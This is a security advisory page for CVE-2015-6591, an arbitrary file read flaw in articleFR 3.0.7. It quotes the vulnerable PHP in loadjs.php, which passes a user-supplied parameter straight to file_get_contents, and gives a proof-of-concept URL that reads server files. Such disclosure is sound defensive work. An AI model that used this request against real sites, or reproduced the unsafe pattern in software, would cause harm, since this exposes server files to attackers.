articleFR 3.0.7 Arbitrary File Read

2015.10.27
Credit: cfreer & 0keeTeam
Risk: High
Local: No
Remote: Yes
CVE: CVE-2015-6591
CWE: CWE-200


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: articleFR any file read vulnerability in v3.0.7 # Date: 2015-09-06 # Vendor: Free Reprintables # Exploit Author: cfreer & 0keeTeam # Product web page: http://www.freereprintables.com # Version: 3.0.7 # CVE : CVE-2015-6591 Details of the vulnerability are as follows: Affected version: Version 3.0.7 and before. Discover date:2015/9/6 Tested on: Apache/2.4.7 (Win32) =================================================== The vulnerable parameter is ?s? ( in articleFR\application\templates\amelia\loadjs.php). Finally, Parameter ?s? was directly into the function of file_get_contents. <? header('Content-Type: application/javascript'); $_content = file_get_contents($_GET['s']); $_content = preg_replace('/(' . $_GET['h'] . ')/sim', $_GET['r'], $_content); print $_content; exit; ?> Proof of Concept: ================================================================================================= http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&r=0keeTeam&s=loadjs.php ================================================================================================= referer: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591

References:

https://github.com/poc-lab/exp/blob/master/CVE-2015-6591


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top